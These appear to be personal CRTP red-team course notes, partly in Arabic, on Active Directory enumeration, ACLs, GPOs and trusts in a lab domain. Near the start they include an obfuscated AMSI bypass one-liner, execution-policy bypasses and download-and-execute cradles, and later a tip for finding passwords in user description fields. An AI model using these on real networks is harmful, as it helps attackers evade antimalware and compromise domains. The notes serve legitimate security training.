CRTP Notes Meshari Almalki

CRTP-Notes-Meshari-Almalki
💡 Meshari-Almalki Enjoy ❤ Twitter: @slv0d Linkedin:@meshari-almalki
Active Directory:
Active Directory (AD) is Microsoft's proprietary directory service. It runs on Windows Server
and enables administrators to manage permissions and access to network resources.
Active Directory stores data as objects. An object is a single element, such as a user,
group, application or device such as a printer. Objects are normally defined as either
resources, such as printers or computers, or security principals, such as users or groups.
PowerShell Cmdlets:
Get-Command -CommandType cmdlet
Get-Process → Get All process on Machine
Execution Policy:
powershell -ExecutionPolicy bypass
powershell -ep bypass
powershell -c <cmd>
powershell -encodedcommand $env:PSExecutionPolicyPreference=”bypass”
PowerShell Module:
This Import a module .
Import-Module <modulePath>
This list all commands of module.
Get-Command -Module <moduleName>
Download EXC cradle:

iex(New-Object Net.WebClient).DownloadString(’https://’)
certutil.exe -urlcache -f “URL” File_name
SèT-Itèm ( 'V'+'aR' + 'IA' + ('blE:1'+'q2') + ('uZ'+'x') ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( Get-varIÀ`BLE ( ('1Q'+'2U') +'z
X' ) -VaL )."A`ssÈmbly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'m
ation.'),'s',('Syst'+'em') ) )."gètfìElD"( ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+'nitF'+'aile') ),( "{2}{4}{0}{1}{3}" -f ('S'+'ta
t'),'i',('Non'+'Publ'+'i'),'c','c,' ))."sE`T`VaLUE"( ${nÙLl},${t`RuE} )
Transfare File:
# PSCP command
pscp <username>@<ip_of_target-Machine>:/<Directory_Of_file> <Destination>
Domain Enumeration
I can use it by .NET class or by scripts like [ PowerView.ps1 ]
AMSI‫ﻗﺒﻞ ﻛﻞ ﺷﻲ ﻻزم اﺳﻮي ﺗﺨﻄﻲ ل‬ ( Antimalware Scan Interface )
CRTP-Notes-Meshari-Almalki 1
📌 Check this GitHub Gist for other PowerShell bypasses — reigningshells/powershell-
bypasses.ps1
1. .NET Class Command to View Domain Name and Other :
[System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
Forest → Name of Forest
Parent → Name of Domain
DomainControllers → There is Just one { dcorp-dc }
DomainModeLevel → Windows Server 2016
Name → Child Domain Name { dollarcorp } { Just one level we have inside Forest}
2. PowerView.ps1
a. Get-NetDomain → For Domain Enumeration .
b. Get-NetDomain -Domain <Domain_Name> → Get object of another Domain
c. Get-DomainSID → Print Domain SID Number ,
d. Get-DomainPolicy → Print Domain Policy for current domain .
(Get-DomainPolicy).”Name_Of_Specific_DomainPolicy”.
(Get-DomainPolicy).’system access’
This help to show value of Domain Policy Like Kerberos Policy , For attack like Golden
Tikcet.
e. Get-NetDomainController
Get-NetDomainController -Domain <Name_Of_Domain>
3. ADModule:
a. Import-Module <Microsoft.ActiveDirectory.Management.dll>
Commands of ADModule:
Get-ADDomain → Like Get-NetDomain in PowerView.ps1
Get-ADDomain -Identity <Domain_Name> → Get object of another Domain
Get-ADDomainController
Users Enumeration
1. PowerView
Get-NetUser → List all users ,
Get-NetUser -User <UserName> → Get Full Information about Specific User .
Get-UserProperty → Get All Properties for username .
Get-UserProperty -Properties <NameOfProperty>
Important :
Search for particular string in a user’s attribute why ??
that’s help for looking some password that forget in description 😉

Find-UserField -SearchField Description -SearchTerm “”
2. ADModule
Get-ADUser -Filter * -Property *
Get-ADUser -Identity <UserName> -Property *
Get-ADUser -Filter * -Properties * | select -First 1 | Get-Member -MemberType
*Property | select Name
Get-ADUser -Filter ‘Description -like “built”’ -Properties Description | select name

, Description
Computer Enumeration
1. PowerView
Get-NetComputer → Computer object in Domain ( Not necssary actually Machine in domain

)
Get-NetComputer -Ping → Which Machine is live or not .
Get-NetComputer -FullData
Get-NetComputer -OperatingSystem “*Server 2016*”
2. ADModule
Get-ADComputer -Filter * | select Name
Get-ADComputer -Filter ‘OperatingSystem -Like “*Server 2016*”’ -Properties

OperatingSystem | select Name,OperatingSystem
Group Enumeration
1. PowerView
Get-NetGroup → List all the domain groups
Get-NetGroup -FullData
Get-NetGroup “Domain Admins” -FullData → Specifie Group Domain Admins .(‫ﺑﻴﻌﻄﻴﻚ ﻣﻌﻠﻮﻣﺎت‬
‫) ﺗﻔﺼﻴﻠﻴﻪ ﻣﻨﻬﺎ ﻣﻦ اﻟﻴﻮزرات ﺻﻼﺣﻴﺘﻬﻢ دوﻣﻴﻦ ادﻣﻦ‬
Get-NetGroup -GroupName “*admin*” → All groups Contains admin keyword
Get-NetGroup -GroupName “*admin*” -Domain <Forest_Root> → to get more group for

enterprise admin and so on , these are groups part avilable only on the DC on they
forest root <moneycorp.local>
2. ADModule
Get-ADGroup -Filter * | Get-ADGroup -Filter * | select Name
Group Member Enumeration
1. PowerView
Get-NetGroupMember -GroupName “Domain Admins”
GroupDomain : dollarcorp.moneycorp.local
GroupName : Domain Admins
MemberDomain : dollarcorp.moneycorp.local
MemberName : svcadmin
MemberSID : S-1-5-21-1874506631-3219952063-538504511-1122
IsGroup : False -> This mean is a member not a group
MemberDN : CN=svc admin,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
MemberName : Administrator -> Built-in Default Domain Administrator
MemberSID : S-1-5-21-1874506631-3219952063-538504511-500 -> for Administrator (500)
IsGroup : False -> This mean is a member not a group
MemberDN : CN=Administrator,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
500 ‫ اﻧﻪ ﻣﻤﻜﻦ ﻳﺘﻐﻴﺮ اﺳﻢ اﻻدﻣﻦ اﻟﻰ اﺳﻢ اﺧﺮ ﻓﻌﺸﺎن ﻛﺬا ﻧﻘﺪر ﻧﻤﻴﺰة ﺑﺮﻗﻢ‬500 ‫اﻟﻔﻜﺮه ﻣﻦ رﻗﻢ‬ 👍
Get-NetGroupMember -GroupName "Enterprise Admins"

//‫ﻣﺎراح ﻳﻌﻄﻴﻨﻲ اي ﻧﺎﺗﺞ ﻟﻴﻪ ؟ ﻻﻧﻪ ﻓﻘﻂ ﻣﺨﺘﺺ ﻓﻲ اﻟﺪوﻣﻴﻦ ﻛﻮﻧﺘﺮول اﻟﻠﻲ ﻫﻮ‬
// moneycorp.local
Get-NetGroupMember -GroupName "Enterprise Admins" -Domain "moneycorp.local"
GroupDomain : moneycorp.local
GroupName : Enterprise Admins
MemberDomain : moneycorp.local -> ‫ﻣﺜﻞ ﻣﺎﻗﻠﺖ ﺗﺎﺑﻊ ﻟﻠﺪوﻣﻴﻦ ذا‬
MemberName : Administrator
MemberSID : S-1-5-21-280534878-1496970234-700767426-500
IsGroup : False
MemberDN : CN=Administrator,CN=Users,DC=moneycorp,DC=local
Get-NetGroupMember -GroupName “Administrators” -Recurse
‫ﻫﺬا ﻣﻌﻨﺎه اذا ﻛﺎن ﻋﻨﺪك ﻋﺒﺎرة ﻋﻦ ﻗﺮوب وﺗﺒﻲ ﺗﻄﻠﻊ اﻟﻤﻤﺒﺮ اﻟﺨﺎص ﻓﻴﻬﻢ ﻟﻜﻞ واﺣﺪ ﻧﺴﺘﺨﺪم رﻳﻜﻴﺮس‬
GroupName : Administrators
MemberDomain : moneycorp.local
MemberName : Enterprise Admins
MemberSID : S-1-5-21-280534878-1496970234-700767426-519
IsGroup : True -> ‫ﻫﺬا ﻋﺒﺎره ﻋﻦ ﻗﺮوب داﺧﻠﻪ ﻣﻴﻤﺒﺮ‬
MemberDN : CN=Enterprise Admins,CN=Users,DC=moneycorp,DC=local
MemberName : Domain Admins
MemberSID : S-1-5-21-1874506631-3219952063-538504511-512
IsGroup : True
MemberDN : CN=Domain Admins,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
MemberSID : S-1-5-21-1874506631-3219952063-538504511-500
IsGroup : False -> ‫ﻫﺬا ﻣﻴﻤﺒﺮ ﻟﻠﻘﺮوب اﻟﻠﻲ ﻫﻮ ادﻣﻨﺴﺘﺮﻳﺘﻮر‬
‫ﺑﻌﺪ ﻣﺎﻧﺴﺘﺨﺪم اﻟﺮﻳﻜﻴﺮس‬
MemberName : Enterprise Admins
MemberSID : S-1-5-21-280534878-1496970234-700767426-519
IsGroup : True
MemberDN : CN=Enterprise Admins,CN=Users,DC=moneycorp,DC=local
GroupDomain : moneycorp.local
GroupName : Enterprise Admins
MemberName : Administrator -> Enterprise Admins‫ﻣﻴﻤﺒﺮ ﺧﺎص ﺑﺎل‬
MemberSID : S-1-5-21-280534878-1496970234-700767426-500
IsGroup : False
MemberDN : CN=Administrator,CN=Users,DC=moneycorp,DC=local
MemberName : Domain Admins
MemberSID : S-1-5-21-1874506631-3219952063-538504511-512
IsGroup : True
MemberDN : CN=Domain Admins,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
MemberName : svcadmin -> Domain Admins‫ﻣﻴﻤﺒﺮ ﺧﺎص ﺑﺎل‬
MemberSID : S-1-5-21-1874506631-3219952063-538504511-1122
IsGroup : False
MemberDN : CN=svc admin,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
MemberSID : S-1-5-21-1874506631-3219952063-538504511-500
IsGroup : False
MemberSID : S-1-5-21-1874506631-3219952063-538504511-500
IsGroup : False
‫ ﻋﺸﺎن اﻋﺮف اﻟﻴﻮزر ﻓﻲ اي ﻗﺮوب ﻣﻮﺟﻮد‬:
Get-NetGroup -UserName <UserName>
Get-NetGroup -Username "Administrator"

dcorp\Denied RODC Password Replication Group
dcorp\Domain Admins
dcorp\Domain Users
dcorp\Group Policy Creator Owners
#‫ﻫﺬي اﻟﻘﺮوﺑﺎت اﻟﻠﻲ ﻳﻨﺘﻤﻲ ﻟﻬﺎ اﻟﻴﻮزر ادﻣﻨﺴﺘﺮﻳﺘﻮر‬
Get-NetGroup -UserName "Administrator" -Domain "moneycorp.local"

mcorp\Denied RODC Password Replication Group
S-1-5-21-280534878-1496970234-700767426-519
mcorp\Schema Admins
mcorp\Group Policy Creator Owners
mcorp\Domain Users
mcorp\Domain Admins
# ‫ﻫﻨﺎ ﺣﺪدت اﻟﺪوﻣﻴﻦ ﻓﻮرﺳﺖ وﻋﻄﺎﻧﻲ ﻣﻌﻠﻮﻣﺎت زﻳﺎدة وﻣﻨﻬﺎ اﻻﻧﺘﺮﺑﺮاﻳﺲ ادﻣﻦ ﻗﺮوب‬
# 519 ‫رﻗﻤﻪ‬
‫ ﻋﺸﺎن اﻋﺮف اﻧﺎ ﻓﻲ اي ﻗﺮوب‬:
PS C:\AD\Tools> whoami
dcorp\student181
PS C:\AD\Tools> Get-NetGroup -UserName "student182"
dcorp\RDPUsers
dcorp\Domain Users
PS C:\AD\Tools> Get-NetGroup -UserName "student182" -FullData
grouptype : -2147483646
displayname : RDP Users
samaccounttype : 268435456
samaccountname : RDPUsers
whenchanged : 10/7/2021 12:53:14 PM
objectsid : S-1-5-21-1874506631-3219952063-538504511-1116 -> not built in group
objectclass : {top, group}
cn : RDP Users
usnchanged : 2769985
dscorepropagationdata : {5/3/2020 9:04:05 AM, 2/21/2019 12:17:00 PM, 2/19/2019 1:0
name : RDP Users
adspath : LDAP://dcorp-dc.dollarcorp.moneycorp.local/CN=RDP Users,CN
description : RDP Users Group
distinguishedname : CN=RDP Users,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
member : {CN=student190,CN=Users,DC=dollarcorp,DC=moneycorp,DC=loca
CN=student188,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
usncreated : 14632
whencreated : 2/17/2019 1:27:15 PM
instancetype : 4
objectguid : 46ead3d4-f93c-4c0f-8f43-81c5e802e0a4
objectcategory : CN=Group,CN=Schema,CN=Configuration,DC=moneycorp,DC=local
usncreated : 12318
grouptype : -2147483646
samaccounttype : 268435456
samaccountname : Domain Users
whenchanged : 2/17/2019 7:01:46 AM
objectsid : S-1-5-21-1874506631-3219952063-538504511-513 -> built in group
objectclass : {top, group}
cn : Domain Users
usnchanged : 12320
dscorepropagationdata : {5/3/2020 9:04:05 AM, 2/21/2019 12:17:00 PM, 2/19/2019 1:
memberof : CN=Users,CN=Builtin,DC=dollarcorp,DC=moneycorp,DC=local
adspath : LDAP://dcorp-dc.dollarcorp.moneycorp.local/CN=Domain User
iscriticalsystemobject : True
description : All domain users
distinguishedname : CN=Domain Users,CN=Users,DC=dollarcorp,DC=moneycorp,DC=lo
name : Domain Users
whencreated : 2/17/2019 7:01:46 AM
instancetype : 4
objectguid : 1d9a6145-d382-4711-92a1-35939195e601
objectcategory : CN=Group,CN=Schema,CN=Configuration,DC=moneycorp,DC=local
List All groups into a domain controller :
Get-NetLocalGroup -ComputerName <DC> -ListGroups

Server Group SID Description
------ ----- --- -----------
dcorp-dc.dollarcorp.moneycorp.local Server Operators S-1-5-32-549 Members can administer domain servers
dcorp-dc.dollarcorp.moneycorp.local Account Operators S-1-5-32-548 Members can administer domain user and
group accounts
dcorp-dc.dollarcorp.moneycorp.local Pre-Windows 2000 Compatible Access S-1-5-32-554 A backward compatibility group which a
llows read access on all users and groups in...
dcorp-dc.dollarcorp.moneycorp.local Windows Authorization Access Group S-1-5-32-560 Members of this group have access to t
he computed tokenGroupsGlobalAndUniversal at...
dcorp-dc.dollarcorp.moneycorp.local Terminal Server License Servers S-1-5-32-561 Members of this group can update user
accounts in Active Directory with informatio...
dcorp-dc.dollarcorp.moneycorp.local Administrators S-1-5-32-544 Administrators have complete and unres
tricted access to the computer/domain
dcorp-dc.dollarcorp.moneycorp.local Users S-1-5-32-545 Users are prevented from making accide
ntal or intentional system-wide changes and ...
List Membership of Administrator Group inside DC :
Get-NetLocalGroup -ComputerName dcorp-dc.dollarcorp.moneycorp.local
ComputerName : dcorp-dc.dollarcorp.moneycorp.local
AccountName : dollarcorp.moneycorp.local/Administrator
IsDomain : True
IsGroup : False
SID : S-1-5-21-1874506631-3219952063-538504511-500 -> Administrator user
Description :
Disabled :
LastLogin : 4/6/2022 6:27:00 AM
PwdLastSet :
PwdExpired :
UserFlags :
ComputerName : dcorp-dc.dollarcorp.moneycorp.local
AccountName : dollarcorp.moneycorp.local/Domain Admins
IsDomain : True
IsGroup : True
SID : S-1-5-21-1874506631-3219952063-538504511-512
Description :
Disabled :
LastLogin :
PwdLastSet :
PwdExpired :
UserFlags :
List Actively Logged users on a computer → Need local admin priv
i’m not a local admin ☹

List Locally logged users on a computer → need remote registry it’s by default on server
OS
Get-Loggedonlocal -ComputerName <DC>

Get-LoggedOnLocal -ComputerName dcorp-dc.dollarcorp.moneycorp.local
ComputerName UserDomain UserName UserSID
------------ ---------- -------- -------
dcorp-dc.dollarcorp.moneycorp.local dcorp Administrator S-1-5-21-1874506631-3219952063-538504511-500
List last logged user on computer ( need administrative and registry on the target )
Get-LastLoggedOn -ComputerName dcorp-dc.dollarcorp.moneycorp.local

WARNING: [!] Error opening remote registry on dcorp-dc.dollarcorp.moneycorp.local. Remote registry likely not enabled.
Find shared on host in current Domain
Invoke-ShareFinder -Verbose -> This will Get all share Include IPC and Print etc
Invoke-ShareFinder -Verbose -ExcludeStandard -ExcludePrint -ExcludeIPC
Invoke-FileFinder -Verbose -> Find Files sensitive on computer in the Domain
Get-NetFileServer -Verbose -> Get All fileservers on Domain
Get-NetFileServer -Verbose
VERBOSE: Get-DomainSearcher search string: LDAP://DC=dollarcorp,DC=moneycorp,DC=local
Group Policy ( GPO )

Group Policy → Provides the ability to manage configuration and changes easily and cetrally
in AD
Allows Configuration of :
1. Security settings
2. Registrty-based policy
3. GPO preferences like startup/shutdown/log-on/logoff - script setting
4. Software installation
Get-NetGPO -> Get GPO
usncreated : 8016
systemflags : -1946157056
displayname : Default Domain Policy -> Name OF GPO
gpcmachineextensionnames : [{35378EAC-683F-11D2-A89A-00C04FBBCFA2}{53D6AB1B-2488-11D1-A28C-00C04FB94F17}][{827D319E-6EAC-11D2-A4
EA-00C04F79F83A}{803E14A0-
B4FB-11D0-A0D0-00A0C90F574B}][{B1BE8D72-6EAC-11D2-A4EA-00C04F79F83A}{53D6AB1B-2488-11D1-A28C-00C04FB9
4F17}]
whenchanged : 2/17/2019 7:14:30 AM
objectclass : {top, container, groupPolicyContainer}
gpcfunctionalityversion : 2
showinadvancedviewonly : True
usnchanged : 13009
dscorepropagationdata : {5/3/2020 9:04:05 AM, 2/21/2019 12:17:00 PM, 2/19/2019 1:04:02 PM, 2/19/2019 12:55:49 PM...}
name : {31B2F340-016D-11D2-945F-00C04FB984F9} -> ObjectID
adspath : LDAP://CN={31B2F340-016D-11D2-945F-00C04FB984F9},CN=Policies,CN=System,DC=dollarcorp,DC=moneycorp,DC=
local
flags : 0
cn : {31B2F340-016D-11D2-945F-00C04FB984F9}
gpcfilesyspath : \\dollarcorp.moneycorp.local\sysvol\dollarcorp.moneycorp.local\Policies\{31B2F340-016D-11D2-945F-00C0
4FB984F9}
distinguishedname : CN={31B2F340-016D-11D2-945F-00C04FB984F9},CN=Policies,CN=System,DC=dollarcorp,DC=moneycorp,DC=local
whencreated : 2/17/2019 7:00:13 AM
versionnumber : 3
instancetype : 4
objectguid : cd0c7024-e03a-4369-958b-9c93fbd25649
objectcategory : CN=Group-Policy-Container,CN=Schema,CN=Configuration,DC=moneycorp,DC=local
Get-NetGPO | select displayname -> Get Just a names of GPO
displayname
-----------
Default Domain Policy # This by default GPO
Default Domain Controllers Policy # This by default GPO
Applocker # This Custom GPO
Servers # This Custom GPO
Students # This Custom GPO
# hostname
-> dcorp-std181
# Get-NetGPO -ComputerName dcorp-std181.dollarcorp.moneycorp.local
usncreated : 65831
displayname : Students -> GPO
gpcmachineextensionnames : [{35378EAC-683F-11D2-A89A-00C04FBBCFA2}{D02B1F72-3407-48AE-BA88-E8213C6761F1}][{827D319E-6EAC-11D2-A4
EA-00C04F79F83A}{803E14A0
B4FB-11D0-A0D0-00A0C90F574B}]
whenchanged : 4/20/2019 6:22:16 AM
usnchanged : 123144
name : {3E04167E-C2B6-4A9A-8FB7-C811158DC97C}
adspath : LDAP://CN={3E04167E-C2B6-4A9A-8FB7-C811158DC97C},CN=Policies,CN=System,DC=dollarcorp,DC=moneycorp,DC=
local
flags : 0
cn : {3E04167E-C2B6-4A9A-8FB7-C811158DC97C}
gpcfilesyspath : \\dollarcorp.moneycorp.local\SysVol\dollarcorp.moneycorp.local\Policies\{3E04167E-C2B6-4A9A-8FB7-C811
158DC97C}
distinguishedname : CN={3E04167E-C2B6-4A9A-8FB7-C811158DC97C},CN=Policies,CN=System,DC=dollarcorp,DC=moneycorp,DC=local
whencreated : 2/19/2019 7:04:25 AM
versionnumber : 8
instancetype : 4
objectguid : 8ecdfe44-b617-4b9e-a9f9-4d548e5dc7b1
ComputerName : dcorp-std181.dollarcorp.moneycorp.local
Get-NetGPOGroup -> For Restricted Group in domian .
Get users which are in local group of a machine using GPO
Find-GPOComputerAdmin -ComputerName <ComputerName> -> This Could be usefull in RealWorld
Get Machines where the given user in member of a specific group
Find-GPOLocation -UserName <userName> -Verbose
Organization Units ( OUs )

Everything in AD is an Object.
OUs ⇒ Container for these object.
is a container within a Microsoft Active Directory domain which can hold users, groups and
computers.
It is the smallest unit to which an administrator can assign Group Policy settings or
account permissions.
An organizational unit can have multiple OUs within it, but all attributes within the
containing OU must be unique.
Active Directory organizational
units cannot contain objects from other domains.
Get-NetOU -FullData -> Get All informations of OUs in a Domain
Get-NetOu -FullData
usncreated : 8147
systemflags : -1946157056
gplink : [LDAP://CN={6AC1786C-016F-11D2-945F-00C04fB984F9},CN=Policies,CN=System,DC=dollarcorp,DC=moneycorp,DC=loca
whenchanged : 2/17/2019 7:00:13 AM
objectclass : {top, organizationalUnit}
showinadvancedviewonly : False
usnchanged : 8147
dscorepropagationdata : {7/2/2021 1:08:59 PM, 5/3/2020 9:04:05 AM, 5/3/2020 9:04:05 AM, 5/3/2020 9:04:05 AM...}
name : Domain Controllers
adspath : LDAP://OU=Domain Controllers,DC=dollarcorp,DC=moneycorp,DC=local
description : Default container for domain controllers
distinguishedname : OU=Domain Controllers,DC=dollarcorp,DC=moneycorp,DC=local
ou : Domain Controllers
whencreated : 2/17/2019 7:00:13 AM
instancetype : 4
objectguid : 051cb518-0bf2-47e4-a3a4-ec36edf5e662
objectcategory : CN=Organizational-Unit,CN=Schema,CN=Configuration,DC=moneycorp,DC=local
Get-NetOU
LDAP://OU=Domain Controllers,DC=dollarcorp,DC=moneycorp,DC=local
LDAP://OU=Applocked,DC=dollarcorp,DC=moneycorp,DC=local
LDAP://OU=Servers,DC=dollarcorp,DC=moneycorp,DC=local
LDAP://OU=StudentMachines,DC=dollarcorp,DC=moneycorp,DC=local
This are all OUs On Domain -> moneycorp.local
Get-NETGPO -GPOname "{gplink}" -> This get applied on an OU,
Get-NetGPO -GPOname "{3E04167E-C2B6-4A9A-8FB7-C811158DC97C}" -> This for OU=StudentMachines
usncreated : 65831
displayname : Students -> GPO name
gpcmachineextensionnames : [{35378EAC-683F-11D2-A89A-00C04FBBCFA2}{D02B1F72-3407-48AE-BA88-E8213C6761F1}][{827D319E-6EAC-11D2-A4EA
B4FB-11D0-A0D0-00A0C90F574B}]
whenchanged : 4/20/2019 6:22:16 AM
usnchanged : 123144
name : {3E04167E-C2B6-4A9A-8FB7-C811158DC97C}
adspath : LDAP://CN={3E04167E-C2B6-4A9A-8FB7-C811158DC97C},CN=Policies,CN=System,DC=dollarcorp,DC=moneycorp,DC=loc
flags : 0
cn : {3E04167E-C2B6-4A9A-8FB7-C811158DC97C}
gpcfilesyspath : \\dollarcorp.moneycorp.local\SysVol\dollarcorp.moneycorp.local\Policies\{3E04167E-C2B6-4A9A-8FB7-C811158
distinguishedname : CN={3E04167E-C2B6-4A9A-8FB7-C811158DC97C},CN=Policies,CN=System,DC=dollarcorp,DC=moneycorp,DC=local
whencreated : 2/19/2019 7:04:25 AM
versionnumber : 8
instancetype : 4
objectguid : 8ecdfe44-b617-4b9e-a9f9-4d548e5dc7b1
Access Control List Model ( ACL )

1. Access Token
a. Security Context of a process
b. Identitiy and privs of user
2. Security Descriptors
a. SID of the Owner
b. Discretionary ACL ( DACL ) → Defines the permissions trustees ( users , groups ) have
on an object
1. System ACL ( SACL ) → Logs success and failure audit message when an object is
accessed
note\ Every object have Security Descriptors
DACL & SACL → Have ( Access Control Entries ) [ ACE ]
ACE → individual permission or audits access. Who has a permission and what can be done
on an object ?
DACL & SACL → Very Important for attacker , DACL Look more cool and
usefull , SACL logs any changes you made to any objects
Get the ACLs associated with the specified object :
Get-ObjectACL -SamAccountName <userName> -ResolveGUIDS

# The GUID resolver parameter gets the group ID of the requested object.
Get-ObjectACL -SamAccountName student181 -ResolveGUIDS
InheritedObjectType : All -> Permission

ObjectDN : CN=student190,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ObjectType : User-Change-Password
IdentityReference : Everyone -> Which User has premission
IsInherited : False
ActiveDirectoryRights : ExtendedRight -> Action ‫اﻻﺷﻴﺎء اﻟﻠﻲ ﻣﻤﻜﻦ ﻳﻨﻔﺬﻫﺎ‬
PropagationFlags : None
ObjectFlags : ObjectAceTypePresent
InheritanceFlags : None
InheritanceType : None
AccessControlType : Deny
ObjectSID : S-1-5-21-1874506631-3219952063-538504511-49160
InheritedObjectType : All
ObjectDN : CN=student190,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ObjectType : All
IdentityReference : BUILTIN\Administrators
IsInherited : True
ActiveDirectoryRights : CreateChild, Self, WriteProperty, ExtendedRight, Delete, GenericRead, WriteDacl, WriteOwner
ObjectFlags : None
InheritanceFlags : ContainerInherit
InheritanceType : All
AccessControlType : Allow
ObjectSID : S-1-5-21-1874506631-3219952063-538504511-49160
Each Block of information are : ACE .
There are 4 interesting properties to check in the results:
ObjectDN (Object Distinguished Name) is the object name — student181
IdentityReference is who has access to the object. As seen above, the built-in
administrators’ group has access to the student181 object.
ActiveDirectoryRights are the types of permissions given to the object. In our

example, the built-in administrators’ group has WriteDacl and WriteOwner on the
student181 object.
AccessControlType is an Allow access.
The WriteOwner permission indicates the object’s ownership which means that the built-
in administrators have full control on the Student181 object. The WriteDACl is right
to modify the objects DACL’s list.
There are other interesting permissions to look for when enumerating Active Directory
rights like in the below list:
To filter through a specific type of permission, use the equal (-eq) operator and
pass it the permission type such as “GenericAll.”
Get-ObjectAcl student181 | Where-Object ActiveDirectoryRights -eq "GenericAll"
Get-ObjectAcl student181 | select IdentityReference, ActiveDirectoryRights | Where-Object ActiveDirectoryRights -eq "Generi
shows the groups who have the GenericAll (full control) permissions on the Student181
object
Get the ACLs associated with the specified prefix to be used for search
Get-ObjectAcl -ADSprefix 'CN=Administrator, CN=Users' -Verbose
Run the Get-ObjectACL command with the ADSPrefix parameter to search for specific
controls using common names [CN], organizational units[OU], or domain controllers [DC]
in the example below, I searched for the access entries associated with the student
machines Organizational Unit
Get-ObjectAcl -ADSprefix 'OU=Studentmachines' -Verbose
You can get the AdPaths of objects by running these commands:
Get ACLs Associated with UNC path
We can search for access controls of network shares like SYSVOL share for enumerating
group policy objects and scripts using its UNC path.
UNC → The Universal Naming Convention is the naming system used in Microsoft Windows for
accessing shared network folders and printers on a local area network.
Syntax Of UNC → \\host-name\share-name\file_path
Get-PathAcl -Path "\\dcorp-dc.dollarcorp.moneycorp.local\sysvol"
Get The ACLs associated with specified LDAP path :
Get-ObjectAcl -ADSpath "LDAP://CN=Domain Admins, CN=Users, DC=dollarcorp, DC=monycorp, DC=local" -ResolveGUIDS -Verbose
ObjectDN : CN=Domain Admins,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ObjectType : All
IdentityReference : NT AUTHORITY\Authenticated Users
IsInherited : False
ActiveDirectoryRights : GenericRead
ObjectFlags : None
ObjectSID : S-1-5-21-1874506631-3219952063-538504511-512 -> -ResolveGUIDS
Search For Interesting ACEs :
Invoke-ACLScanner -ResolveGUIDS
ObjectDN : CN=Support179User -> User ,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ObjectType : All
IdentityReference : dcorp\RDPUsers -> Group RDPUsers
IsInherited : False
ActiveDirectoryRights : GenericAll -> Full Permission
ObjectFlags : None
ObjectSID : S-1-5-21-1874506631-3219952063-538504511-49134
IdentitySID : S-1-5-21-1874506631-3219952063-538504511-1116
Check Lab3 for Invoke-ACLScanner.
Trusts
Trust → relationship between two domains or forests which allowes users of one domain or
forest to access resources in the other domain or forest.
Each Trust can Represent as → Trusted Domain Object ( TDO )
TDO → Each domain within a forest is represented by a TDO that is stored in the System
container within its domain.
Active Directory follows a clear hierarchy, from top to bottom. In that hierarchy are:
forests, trees, and domains.
1. Forest → represent the complete Active Directory instance, and are logical containers
made up of
a. Domain Trees
b. Domains
c. Organizational Units
2. Trees → collections of domains within the same DNS namespace ; these include child domains .
3. Domains → logical grouping of network objects such as computers, users, applications,

and devices on the network such as printers.
Active Directory Trust:
In simplest terms, it is the process of extending the security boundary of an AD domain or
forest to include another AD domain or forest.
Trust Direction:
1. One-way trust ( Unidirectional ) → Users in the trusted domain can access resources in
the trusting domain but the reverse is not true. ( i trust you, but you don’t trust me
)
‫ ﻟﻜﻦ اﻟﻌﻜﺲ ﻣﻤﻨﻮع‬, ‫ ﻫﻨﺎ اﻟﺪوﻣﻴﻦ ﺑﺎﻟﻴﺴﺎر ﻳﻌﻄﻲ ﺻﻼﺣﻴﻪ ﻟﻠﻮﺻﻮل ﻟﻤﻮارده ﻣﻦ اﻟﺪوﻣﻴﻦ اﻟﻠﻲ ﺑﺎﻟﻴﻤﻴﻦ‬.
2- Two-Way ( bidirectional ) → Users of Both domains can access resource in other domain.
Domain 2 has a one-way trust to Domain 1. That means all resources within Domain 1 are
🚫
permitted to access the resources of Domain 2 but not vice versa (domain 2 cannot access
domain 1)
Trust Transitivity :
Transitive Trust:
Can be extended to esatblish trust relationship with other domains.
All the default intra-forest trust relationships (Tree-root, Parent-Child) between
domains within a same forest are transitive two-way trusts
what is the intra-forest and inter-forest?
Intra-Forest Migration: migration between domains of the same Forest.
Inter-Forest Migration: migration between domains of different Forests.
we see that “Forest 1” has a transitive 2-way direction to “Forest2”

,which means that all domains within “Forest 1” are accessible to “Forest 2” and the other
way around. The same applies inside the forests, on the tree-root and parent-child levels.
Non-Transitive Trust:
Cannot be extended to other domains in the forest. Can be two-way or one-way.
This is the default trust (called external trust) between two domains in different
forests when forests do not have a trust relationship. → ‫ﻫﺬي ﺑﻴﻦ اﻟﺪوﻣﻴﻨﺎت ﻓﻲ ﻓﻮرﻳﺴﺖ ﻣﺨﺘﻠﻔﺎت‬
The diagram below shows one-way external trust between “Domain 2”

in “Forest 2” and “Forest 1” The arrowhead indicates the access direction. In this
case, Forest 1 users have access to Domain 2 in Forest 2 only. Domain 2 in Forest 2 has NO
access to Forest 1.
2 ‫ﻫﻨﺎ اﻟﻌﻼﻗﻪ ﻣﻮ ﻣﻊ اﻟﻔﻮرﻳﺴﺖ ﺑﺸﻜﻞ ﻛﺎﻣﻞ ﻓﻘﻂ اﻟﺪوﻣﻴﻦ رﻗﻢ‬
Trusts can be created using the New Trust Wizard found in the Active
Directory Domains and Trusts console, or using the Netdom command line
utility
Relationship Trust:
1. Parent/Child Trust
2. Tree/Root Trust
3. Shotcut Trust
4. Forest Trust
5. Realm Trust
6. External Trust
Crtp-Report-Exam
Trusts Type (1)
Trust
Characteristics Direction AuthenticationMechanism Notes
Type
Parent- Created automatically when a child
Transitive Two-way Kerberos V5 or NTLM
Child domain is added.
Tree- Created automatically when a new Tree
Transitive Two-way Kerberos V5 or NTLM
Root is added to a forest.
One-way Created Manually.Used in an AD DS

Shortcut Transitive or Two- Kerberos V5 or NTLM forest to shorten the trust path to
way improve authentication times.
One-way
Created Manually.Used to share
Forest Transitive or Two- Kerberos V5 or NTLM
resources between AD DS forests.
way
